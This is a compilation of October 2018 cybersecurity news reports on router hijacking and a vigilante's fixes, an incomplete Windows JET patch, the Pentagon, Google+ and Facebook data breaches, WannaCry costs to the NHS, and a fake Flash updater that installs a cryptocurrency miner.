A Russian cyber vigilante is patching outdated MikroTik routers exposed online
15.10.2018 securityaffairs
Vulnerebility

A Russian-speaking hacker, who goes by the name of Alexey, claims to have hacked into over 100,000 MikroTik routers with a specific intent, disinfect them.
Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.

The campaign started in Brazil, but it rapidly expanded to other countries targeting MikroTik routers all over the world, over 200,000 devices were compromised.

In September thousands of unpatched MikroTik Routers were involved in new cryptocurrency mining campaigns.

Threat actors also exploited the exploit code for the CVE-2018-14847 vulnerability in MikroTik routers to recruit them in botnets such as Mirai and VPNFilter.

Alexey is a Russian-speaking cyber vigilante that decided to fix the MikroTik routers and he claims to be e system administrator.

Alexey described his activity on a Russian blogging platform, he explained he hacked into the routers to change settings and prevent further compromise.

“I added firewall rules that blocked access to the router from outside the local network,” Alexey wrote.

“In the comments, I wrote information about the vulnerability and left the address of the @router_os Telegram channel, where it was possible for them to ask questions.”

Alexey changed settings for over 100,000 users, but only 50 users contacted his via Telegram but of them were angry for the intrusion.

According to the researcher Troy Mursch, currently, there are over 420,000 MikroTik routers exposed only that have been abused in cryptocurrency-mining campaigns.

MikroTik routers continue to be under attack, and the situation is getting worse because of the availability of a new PoC code.

The new attack technique was recently discovered by experts at Tenable Research and it could be exploited by remote attackers to execute arbitrary code on the vulnerable devices.

The experts at Tenable Research presented the technique on October 7 at DerbyCon 8.0 during the talk “Bug Hunting in RouterOS” at Derbycon, it leverages a known directory traversal flaw tracked as CVE-2018-14847.

Mikrotik routers vulnerable

Just to be clear, despite Alexey has broken into the infected routers to sanitize them, this action is technically considered a cybercrime.

The bad aspect of the story is that even if security patches have been available for months, ISPs and owners of the home routers still have installed them.


Microsoft fixed the Zero-Day for JET flaw, but the fix is incomplete
15.10.2018 securityaffairs
Vulnerebility

Experts from 0Patch revealed that the Microsoft Zero-Day Patch for JET Database Engine vulnerability (CVE-2018-8423) is incomplete.
The vulnerability was discovered by the researcher Lucas Leong of the Trend Micro Security Research team that publicly disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows.

The flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

Experts highlighted that the exploitation of the flaw requires user interaction, the attackers have to trick victims into opening a malicious file that would trigger the bug.

The specially crafted file has to contain data stored in the JET database format.

Lucas Leong reported the flaw to Microsoft in early May 2018, he expected the flaw would have been fixed with the September 2018 Patch Tuesday set of security updates, but Microsoft did not fix it.

“Today, we are releasing additional information regarding a bug report that has exceeded the 120-day disclosure timeline” stated the blog post published by ZDI.

“An out-of-bounds (OOB) write in the Microsoft JET Database Engine that could allow remote code execution was initially reported to Microsoft on May 8, 2018. An attacker could leverage this vulnerability to execute code under the context of the current process, however it does require user interaction since the target would need to open a malicious file. As of today, this bug remains unpatched.”

At the end of September, 0patch community released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative-

Last week Microsoft addressed the flaw as part of its Patch Tuesday updates.

0patch now issued another micropatch to correct the official Microsoft patch that according to the experts is incomplete.

The root cause of the problem resides in the Window’s core dynamic link libraries “msrd3x40.dll.”

“As expected, the update brought a modified msrd3x40.dll binary: this is the binary with the vulnerability, which we had micropatched with four CPU instructions (one of which was just for reporting purposes).” wrote Mitja Kolsek, a researcher with the 0patch team.

“The version of msrd3x40.dll changed from 4.0.9801.0 to 4.0.9801.5 and of course its cryptographic hash also changed – which resulted in our micropatch for this issue no longer getting applied to msrd3x40.dll.”

Experts pointed out that the official patch doesn’t fix the vulnerability, but only limited it. The micropatch works on fully updated 32-bit and 64-bit Windows 10, Windows 8.1, Windows 7, Windows Server 2008 and Windows Server 2012, as well as other Windows versions that share the same version of msrd3x40.dll.

“So we BinDiff-ed the patched msrd3x40.dll to its vulnerable version and reviewed the differences. At this point we will only state that we found the official fix to be slightly different to our micropatch, and unfortunately in a way that only limited the vulnerability instead of eliminating it.” continues Kolsek.

“We promptly notified Microsoft about it and will not reveal further details or proof-or-concept until they issue a correct fix.”

0patch reported the problem to Microsoft and it plans to publish the official proof-of-concept code after the tech giant will fix it.


Pentagon Defense Department travel records data breach
14.10.2018 securityaffairs
Incindent

Pentagon – Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.
The Pentagon revealed that the Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months ago and could have affected as many as 30,000 workers. The security breach was notified to the leaders on October 4.

“According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.” reads the post published by the Associated Press.

“The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.”

Pentagon

Lt. Col. Joseph Buccino, a Pentagon spokesman, declared the Defense is still investigating the incident, the security breach affected a still unidentified commercial vendor that provided service to Defense Department.

“It’s important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population” of Defense Department personnel, said Buccino.

“The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel,” said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

The department is not identifying the vendor for security reason, it is still under contract, but the department “has taken steps to have the vendor cease performance under its contracts.”


NHS is still assessing the cost of WannaCry one year later
14.10.2018 securityaffairs
Ransomware

The UK’s Department of Health and Social Care provided an update on the efforts to secure the NHS IT infrastructure, with a focus on WannaCry overall costs.
The UK’s Department of Health and Social Care provided an update on the spent to secure the IT infrastructure in a report titled “Securing cyber resilience in
health and care“. One year later the massive WannaCry ransomware attack the NHS is still facing problems caused by the infections.

NHS WannaCrypt ransomware

WannaCry cost the NHS £92m, giving a look at the expense details we can observe item of £19m for lost output and an estimate of £73m of IT cost to fix affected assets.

According to the report, the attack directly impacted over 19,000 patients whose appointments were canceled due to the attack.

The estimate in the report considers the financial costs in two time periods:

during the attack between 12 and 18 May 2017;
during the recovery period in the immediate aftermath to June-July 2017;
The analysis focus on two categories of cost are:

Direct impact – lost output of patient care caused by reduced access to information and systems required for care leading to cancelled appointments etc.
Additional IT support provided by NHS organisations or IT consultants to restore data and systems affected by the attack.
“The WannaCry attack disrupted services across one-third of hospital trusts and around 8% of GP practices. This had a knock-on impact on patients with over 19,000 appointments cancelled.” reads the report.

“While this may only be a small proportion of overall NHS activity, it represents disruption to the care of a significant number of patients.”

The attack highlighted the inefficiency of the antiquated NHS IT systems, Microsoft was charged to update the entire infrastructure with a three-year deal of £150m deal.

The report includes a case study related a “large NHS mental health trust” that was protected with Advanced Threat Protection that allowed to repeal a phishing email attack with a weaponized excel spreadsheet attachment.

IBM was also hired by the NHS to deliver the new Cyber Security Operations Centre (CSOC) aimed at increasing the capability to monitor, detect and respond to
a variety of security risks and threats across the organization.

NHS signed a three-year strategic partnership with IBM (£30m) to improve NHS Digital’s Cyber Security Operations Centre (CSOC)

The goal is the compliance with the Cyber Essentials Plus standard in June 2021, as recommended in February’s lessons-learned report.

Currently, only 10 sites will “aim” to reach this goal next March.


Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update
14.10.2018 securityaffairs
Virus

Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.
A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

“Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.


Pentagon Reveals Cyber Breach of Travel Records
14.10.2018 securityweek
BigBrothers  Incindent

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

Pentagon Breach"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.

Pentagon Breach

The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 2018, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached into the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.


Industry Reactions to Google+ Security Incident: Feedback Friday
14.10.2018 securityweek
Social

Google announced this week that it has decided to shut down its Google+ social network. The announcement also revealed the existence of an API bug that exposed personal information from as many as 500,000 accounts.

According to Google, the flaw gave hundreds of third-party apps access to user information such as name, email address, occupation, gender and age. However, the Internet giant said it had found no evidence of abuse.

Google discovered the bug in March 2018, but waited until now to disclose it, which has raised a lot of questions. The Wall Street Journal reported that Google executives decided not to notify users earlier due to concerns it would attract the attention of regulators and draw comparisons to the Cambridge Analytica data privacy scandal that hit Facebook.

Industry reactions to Google+ security incident

Industry professionals have commented on various aspects of the story, including the vulnerability, legal implications, impact on Google, and how APIs can be secured.

And the feedback begins...

Paul Bischoff, Comparitech:

"In my view, Google is basically pleading ignorance in order to shield itself from legal ramifications. It has conveniently left out some crucial figures in its response that would give us a more clear picture of the scope of this incident. For example, Google says 438 applications had unauthorized access to Google+ profile data, but it doesn't say how many of its users used those apps. And while Google says it performed a cursory investigation and found nothing suspicious, it also notes that it didn't actually contact or audit any of the developers of those apps.

As popular and high-profile as Google is, and due to the fact that this vulnerability existed for the better part of three years, it would be reasonable to assume the number of occurrences in which Google+ data was obtained and misused is non-zero.

Although there's no federal breach notification law in the US, every state now has its own breach notification law. However, these laws only apply when it's clear that data was obtained by an unauthorized third party. By turning a blind eye as to whether this occurred and only acknowledging that a vulnerability existed, Google can plead ignorance."

Ilia Kolochenko, CEO, High-Tech Bridge:

"Unlike the recent Facebook breach, this disclosure timeline is incomprehensibly long and will likely provoke a lot of questions from regulatory authorities. Inability to assess and quantify the users impacted does not exempt from disclosure. Although, a security vulnerability per se does not automatically trigger the disclosure duty, in this case it seems that Google has some reasonable doubts that the flaw could have been exploited. Further clarification from Google and technical details of the incident would certainly be helpful to restore confidence and trust among its users currently abandoned in darkness.

Technically speaking, this is one more colourful example that bug bounty is no silver bullet even with the highest payouts by Google. Application security is a multi-layered approach process that requires continuous improvement and adaptation for new risks and threats. Such vulnerabilities usually require a considerable amount of efforts to be detected, especially if it (re)appears on a system that has been already tested. Continuous and incremental security monitoring is vital to maintain modern web systems secure."

Matt Chiodi, VP of Cloud Security, RedLock:

“Given Google's largely stellar reputation, I am shocked that they would purposefully choose to not disclose this incident. We have learned from similar situations that consumers possess a strong ability to forgive when companies take immediate and demonstrable steps to ensure their mistakes are not repeated. Think about J&J with the Tylenol scandal in the 1980s. Because of their swift response, J&J remains one of the most trusted brands. Google could lose a great deal of respect and ultimately revenue if this report is true.”

Bobby S, Red Team, ThinkMarble:

"The fact that Google chose to shut Google+ down on discovering this breach is telling of how serious it is. It appears that a bug in the API for Google+ had been allowing third-party app developers to access the data not just of users who had granted permission, but of their friends. The vast majority of social media platforms that we use every day monetise our data by making it available to 3rd parties via an API, but it is not acceptable that exploitative practices continue.

This has echoes of the Cambridge Analytica scandal that hit Facebook and has led to much greater scrutiny of Facebook’s policies and openness towards how data is accessed, used and shared. Similarly, Google must seriously consider how it continues to operate alongside third-party developers. This is especially relevant now that the GDPR is in force, affecting any company with users in the EU.

As a data controller, under Article 32 of the GDPR, Google now has greater obligations to ensure that its data-processors (including third-party app developers) implement measures to both ensure the security of personal data, but also gain the proper permissions from individual users to access it. In wake of this new regulation, these same companies also now hold a legal requirement to take appropriate actions to secure and pseudonymize this data before making it available through their services."

Pravin Kothari, CEO, CipherCloud:

“Google’s unofficial motto has long been ‘don’t be evil.’ Alphabet, the Google parent company, adapted this to ‘do the right thing.’

Google’s failure, if true, to not disclose to users the discovery of a bug that gave outside developers access to private data, is a reoccurring theme. We saw recently that Uber was fined for failing to disclose the fact that they had a breach, and instead of disclosing, tried to sweep it under the rug.

It’s not surprising that companies that rely on user data are incented to avoid disclosing to the public that their data may have been compromised, which would impact consumer trust. These are the reasons that the government should and will continue to use in their inexorable march to a unified national data privacy omnibus regulation.

Trust and the cloud do not go together until responsibility is taken for locking down and securing our own data. Even if your cloud offers the ability to enforce data protection and threat protection, it is not their data that is compromised and potentially used against them, it is the consumers.

Enterprises leveraging cloud services need to ensure additional security measures and data is protected before it is delivered to a third-party cloud service - this is the only way we can ensure data is protected.”

Colin Bastable, CEO, Lucy Security:

“Don’t be Evil mutated into Don’t be Caught. Google’s understandable desire to hide their embarrassment from regulators and users is the reason why states and the feds impose disclosure requirements – the knock-on effects of security breaches are immense.

The risk of such a security issue is shared by all of the Google users' employers, banks, spouses, colleagues, etc. But I guess we can trust them when we are told there was no problem.”

Etienne Greeff, CTO and co-founder, SecureData:

The news today that Google covered up a significant data breach, affecting up to 500,000 Google+ users, is unfortunately unsurprising. It’s a textbook example of the unintended consequences of regulation – in forcing companies to comply with tough new security rules, businesses hide breaches and hacks out of fear of being the one company caught in the spotlight.

Google didn’t come clean on the compromise, because they were worried about regulatory consequences. While the tech giant went beyond its “legal requirement in determining whether to provide notice,” it appears that regulation like GDPR is not enough of a deterrent for companies to take the safety of customer data seriously. And so this type of event keeps on happening. While Google has since laid out what it intends to do about the breach in support of affected users, this doesn’t negate the fact that the breach – which happened in March – was ultimately covered up.

However, there are events that are happening far closer to home that aren’t getting the attention they deserve. We seem to pay more attention to the big tech breaches, when businesses such as the supermarket chain Morrisons is undergoing a class action lawsuit against them, for failing to protect deliberately leaked employee data. Last year the High Court ruled that the supermarket was what they termed “vicariously liable” as the Internal Auditor in question was acting in the course of his own employment at the company when he leaked that information online. The implications of this type of action are huge – if businesses can be held accountable for the actions of rogue employees acting criminally, then we will have to treat all our employees as malicious threat actors – which is a huge thing to consider and could have momentous repercussions across the globe in all industries.

Until then, we will undoubtedly see even more of this ‘head-in-the-sand’ practice in the future, especially given GDPR is now in force from larger tech firms. It ultimately gives hackers another way of monetising compromises – just like we saw in the case of Uber. This is dangerous practice, and changes need to be made across the technology industry to make it a safer place for all. Currently, business seems to care far more about covering its own back than the compromise of customer data. It’s a fine line to walk."

Bryan Becker, application security researcher, WhiteHat Security:

“Even giants can have security flaws. I’m sure the offices of Facebook breathed a collective sigh of relief today, as they’re pushed out of the headlines by a new privacy breach at competitor Google.

Breaches like this illustrate the importance of continuous testing and active threat modeling, as well as the attention that APIs require for secure development and least information/privilege principles. Companies like Google grow large and fast, and can have a problem keeping every exposed endpoint under scrutiny. No one person can possibly be aware of every use or permutation of a single piece of code or API, or microservice.

For organizations that already have a large architecture, knowing where and how to start evaluating security can be a challenge in and of itself. In these cases, organizations can benefit from active threat modeling – basically a mapping of all front-end services to any other services they talk to (both backend and frontend), often drawn as a flow-chart type of diagram. With this mapping, admins can visualize what services are public facing (as in, need to be secured and tested), as well as what is at risk if those services get compromised. In some ways, this is the first step to taking ‘inventory’ in the infosec world.

Once the landscape is mapped out, automated testing can take a large portion of the strain by continuously scanning various services – even after they become old. Of course, automated testing is not a be-all/end-all solution, but it does carry the benefit that old or unused-but-not-yet-retired services continue to have visibility by the security team, even after most of the engineering team is no longer paying attention or has moved onto more interesting projects.”

Jessica Ortega, website security analyst, SiteLock:

"Google announced that it will be shutting down its controversial social media network Google+ over the next ten months in the wake of a security flaw. This flaw allowed more than 400 apps using the Google+ API to access the personal information of approximately 500,000 users. The flaw was discovered in March, but Google opted not to disclose this vulnerability as it found no evidence that the information had been misused. Additionally, the decision not to disclose the discovered vulnerability speaks to a fear of reputational damage and possible legal ramifications or litigation in light of recent Senate hearings and GDPR.

This type of behavior may become more common among tech companies aiming to protect their reputation in the wake of legislation and privacy laws--they may choose not to disclose vulnerabilities that they are not legally required to report in order to avoid scrutiny or fines. Ultimately it will be up to users to proactively monitor how their data is used and what applications have access to that data by using strong passwords and carefully reviewing access requests prior to using an app like Google+."

Rusty Carter, VP of Product Management, Arxan Technologies:

“This shows yet again that “free” is anything but free. The cost of many of these services is your privacy and your data. In this case, the situation is even worse. Negligence led to more data exposed than intended, and – as the Wall Street Journal reported - Google did not notify users for months about this issue due to fear of disclosure.

While regional legislation may certainly impact how this proceeds, it is clear that consumer awareness of security is increasing quickly and the long term success of businesses will be heavily dependent on their reputation and consumers trust that they are securing and protecting their private and personal information.”

Kevin Whelan, CTO, ITC Secure:

"From a security standpoint, this again highlights the risks of how personal data can be accessed by third parties – in this case names, email, addresses, ages, occupations and relationship status were accessible through an open API.

From a business standpoint, it’s also a blow as they have had to close the social network, albeit the average touch time was five seconds and was deemed to be unpopular compared to platforms such as Facebook and Twitter. This bug has been around for a long time, so whilst there’s no evidence that data has been misused, it will require forensic investigation. What’s also surprising here is that Google say that they don’t keep logs for more than two weeks so aren’t able see what data had been accessed."

Brian Vecci, Technical Evangelist, Varonis:

“This is a breach almost everyone can relate to, because everyone has a Google account and between emails, calendars, documents and other files, lots of people keep a ton of really valuable data in their Google account -- so unauthorised access could be really damaging. On top of that, when you get access to someone’s primary email—which for many people is Gmail, you’ve got the keys to their online life. Not only do you have their login, which is almost always their email, you have the ability to reset any password since password reset links are sent via email. A Gmail breach could be the most damaging breach imaginable for the most number of people the longer it goes undetected. If Google knew about a potential breach and didn’t report it, that’s a huge red flag.

Unlike many other types of accounts, Google serves for many users as the authentication for other apps like Facebook. Last week, Facebook said they had no evidence that linked apps were accessed. But if these linked apps were accessed due to a breach, it could expose all kinds of personal user data. If you’re using Google or Facebook to login to other apps, there is a whole web of information that could be exposed. Breaches like these are the reason why Google, Facebook and other big tech players need to be regulated - they are a gateway to other applications for business and personal use.”


U.S. Senators Demand Internal Memo Related to Google+ Incident
14.10.2018 securityweek
BigBrothers

A group of United States senators on Thursday sent a letter to Google, urging it to provide an internal memo that supposedly explains why the company did not disclose the Google+ data exposure that was discovered in March.

Affecting a Google+ API, the vulnerability provided applications with access to data they were not supposed to access, and up to 500,000 user accounts might have been impacted. The API was apparently exposing user data since 2015.

Google claims it has no evidence of developers being aware of the bug or of account data being misused. However, the Internet giant decided to shut down the Google+ platform, citing low user interest and difficulties in making it successful.

Amid privacy concerns rising from the Facebook-Cambridge Analytica scandal that erupted in March, the search company’s decision to cover up the flaw’s discovery doesn’t bode well with the privacy-conscious. The disclosure also cast a dark shadow over the launch of Google’s new phone, the Pixel 3.

Privacy concerns is what three U.S. senators underline in a letter (PDF) sent to Google chief executive officer Sundar Pichai.

They also question the Internet giant’s decision against a timely disclosure of the data exposure, as well as its willingness to inform the public when it becomes aware of any misuse of the impacted data.

The letter also mentions a Wall Street Journal article that refers to an internal memo at Google that details factors that determined the company to cover up the issue, such as fears that it would catch the attention of regulators and even draw comparisons to the Facebook privacy scandal.

“Data privacy is an issue of great concern for many Americans who use online services. Particularly in the wake of Cambridge Analytica controversy, customers’ trust in the companies that operate those services to keep their data secure has been shaken,” the letter reads.

“It is for this reason that the reported contents of Google’s internal memo are so troubling. At the same time that Facebook was learning the important lesson that tech firms must be forthright with the public about privacy issues, Google apparently elected to withhold information about a relevant vulnerability for fear of public scrutiny,” the letter continues.

What’s more, the senators mention the fact that, although Pichai testified in front of the Senate Commerce Committee on the issue of privacy only a couple of weeks ago, he did not mention the Google+ issue at the time.

“Google must be more forthcoming with the public and lawmakers if the company is to maintain or regain the trust of the users of its services,” the letter continues.

The senators request Pichai to provide written response to questions regarding when and how Google discovered the Google+ issue, on why it chose not to disclose it, whether it did inform federal agencies of the discovery, and if there are any other incidents it chose not to disclose, among others.

On top of that, the senators, who urge Google to provide a copy of the internal memo cited in the Wall Street Journal, ask the search company whether users of free Google services “should be afforded the same level of notification and mitigation efforts as paid G Suite subscribers” (Google is apparently committed to inform G Suite users immediately of any incidents involving their data).


Purging Long-Forgotten Online Accounts: Worth the Trouble?
14.10.2018 securityweek
Security
The internet is riddled with long-forgotten accounts on social media, dating apps and various shopping sites used once or twice. Sure, you should delete all those unused logins and passwords. And eat your vegetables. And go to the gym.

But is it even possible to delete your zombie online footprints — or worth your time to do so?

Earlier this month, a little-used social network notified its few users that it will soon shut down. No, not Google Plus; that came five days later, following the disclosure of a bug that exposed data on a half-million people. The earlier shutdown involved Path, created by a former Facebook employee in 2010 as an alternative to Facebook. Then there's Ello sending you monthly emails to remind you that this plucky but little-known social network still exists somehow.

It might not seem like a big deal to have these accounts linger. But with hacking in the news constantly, including a breach affecting 50 million Facebook accounts, you might not want all that data sitting around.

You might not have a choice if it's a service you use regularly. But for those you no longer use, consider a purge. Plus, it might feel good to get your online life in order, the way organizing a closet does.

Take dating apps such as Tinder, long after you found a steady partner or gave up on finding one. You might have deleted Tinder from your phone, but the ghost of your Tinder account is still out there — just not getting any matches, as Tinder shows only "active" users to potential mates.

Or consider Yahoo. Long after many people stopped using it, Yahoo in 2016 suffered the biggest publicly disclosed hack in history, exposing the names, email addresses, birth dates and other information from 3 billion active and dormant accounts. This sort of information is a goldmine for malicious actors looking to steal identities and gain access to financial accounts.

Trouble is, cleaning up your digital past isn't easy.

For one, finding all the old accounts can be a pain. For some of us, it might not even be possible to recall every dating site and every would-be Twitter that never was, not to mention shopping or event ticketing sites you bought one thing from and forgot about.

Then, you'll have to figure out which of your many email accounts you used to log in to a service, then recover passwords and answer annoying security questions — assuming you even remember what your favorite movie or fruit was at the time. Only then might you discover that you can't even delete your account. Yahoo, for instance, didn't allow users to delete accounts or change personally identifying information they shared, such as their birthday, until pressured to do so after the breach.

Even without these hurdles, real life gets in the way. There are probably good reasons you still haven't organized your closet, either.

Perhaps a better approach is to focus on the most sensitive accounts. It might not matter than a news site still has your log in, if you never gave it a credit card or other personal details (of course, if you reused your bank password you might be at risk).

Rich Mogull, CEO of data security firm Securosis, said people should think about what information they had provided to services they no longer use and whether that information could be damaging should private posts and messages inadvertently become public.

Dating sites, in particular, can be a trove of potentially damaging information. Once you're in a relationship, delete those accounts.

It's wise to set aside a time each year — maybe after you do your taxes or right after the holidays — to manage old accounts, said Theresa Payton, who runs the security consulting company Fortalice Solutions and served under President George W. Bush as White House chief information officer.

For starters, visit haveibeenpwned.com. This popular tool lets you enter your email addresses and check if it has been compromised in a data breach. Ideally, the attacked company should have notified you already, but that's not guaranteed. Change passwords and close accounts you don't need.

You might also check justdeleteme.xyx, which Payton said could help navigate the "complexities of saying goodbye." The site has a list of common and obscure services. Looking through it might remind you of some of the services you've used back in the days. Click on a service for details on how to delete your account.

You might discover that some services simply won't let you go. That could be an oversight from a startup prioritizing other features over a deletion tool. Or, it could be intentional to keep users coming back. There's not much you can do beyond deleting as many posts, photos and other personal data as you can.

What to do with accounts of people who have died is a whole other story . That said, the prospect of the Grim Reaper — and what sorts of information about you may be exposed after you shed this mortal coil — might just be the motivation you need to clean up your online trail.


Ex-NASA Contractor Pleads Guilty in Cyberstalking Scheme
14.10.2018 securityweek
Cyber
A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has pleaded guilty to federal charges.

Twenty-eight-year-old Richard Bauer of Los Angeles entered pleas Thursday to stalking, computer hacking and aggravated identity theft.

Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.

Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.


Facebook Says Hackers Accessed Data of 29 Million Users
14.10.2018 securityweek
Social
Facebook Hack Details

Facebook said Friday that hackers accessed personal data of 29 million users in a breach at the world's leading social network disclosed late last month.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

"We now know that fewer people were impacted than we originally thought," Facebook vice president of product management Guy Rosen said in a conference call updating the investigation.

The hackers -- whose identities are still a mystery -- accessed the names, phone numbers and email addresses of 15 million users, he said.

For another 14 million people, the attack was potentially more damaging.

Facebook said cyberattackers accessed that data plus additional information including gender, religion, hometown, birth date and places they had recently "checked in" to as visiting.

No data was accessed in the accounts of the remaining one million people whose "access tokens" were stolen, according to Rosen.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Vulnerability in the code

Facebook said engineers discovered a breach on September 25 and had it patched two days later.

That breach allegedly related to a "view as" feature -- described as a privacy tool to let users see how their profiles look to other people. That function has been disabled for the time being as a precaution.

Facebook reset the 50 million accounts believed to have been affected, meaning users would need to sign back in using passwords.

The breach was the latest privacy embarrassment for Facebook, which earlier this year acknowledged that tens of millions of users had their personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"We face constant attacks from people who want to take over accounts or steal information around the world," chief executive Mark Zuckerberg said on his own Facebook page when the breach was disclosed.

"While I'm glad we found this, fixed the vulnerability, and secured the accounts that may be at risk, the reality is we need to continue developing new tools to prevent this from happening in the first place."

Facebook said it took a precautionary step of resetting "access tokens" for another 40 million accounts which had accessed the "view as" function.

'Seed' accounts

Hackers evidently started the cyber-onslaught on September 14 with 400,000 "seed accounts" they had a hand in or were otherwise close to, according to Rosen.

"The attackers started with a set of accounts they controlled directly, then moved to their friends, and their friend's friends, and so on -- each time taking advantage of the vulnerability," he added.

The exploit allowed hackers to steal copies of access tokens from accounts of "friends" by using the "view as" feature.

Once they had keys to accounts, hackers had the ability to get into them and control them as though they were the real owner.

Hackers could have seen the last four digits of credit card data in people's accounts, with the rest hidden for security, but there was no sign that data was taken, according to Facebook.

Rosen said they found no reason yet to believe hackers were in interested in people's information, rather that it appeared the mission was to harvest access tokens from friends associated with breached accounts.

He declined to discuss progress regarding figuring out who was behind the attack, saying Facebook had been asked by the FBI to remain quiet on the topic.

The California-based social network says it is cooperating with the FBI, US Federal Trade Commission, Irish Data Protection Commission and other authorities regarding the breach.

Rosen said the FBI investigation also limited what he could disclose about what the hackers' end-goal may have been, but maintained that Facebook had "no reason to believe this attack was related to the mid-term elections" in the US.


Facebook Data Breach Update: attackers accessed data of 29 Million users
13.1.0218 securityaffairs 
Social

Facebook data breach – The company provided an updated for the data breach it disclosed at the end of September, hackers accessed personal data of 29 million users.
Facebook announced that hackers accessed data of 29 Million users, a number that is less than initially thought of 50 million.

The hackers did not access did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of the users, it allows users to see how others see their profile.

Earlier this month Facebook revealed attackers chained three bugs to breach into the Facebook platform.

“We now know that fewer people were impacted than we originally thought,” said Facebook vice president of product management Guy Rosen in a conference call.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they were controlling directly then they expanded their activity to their networks.

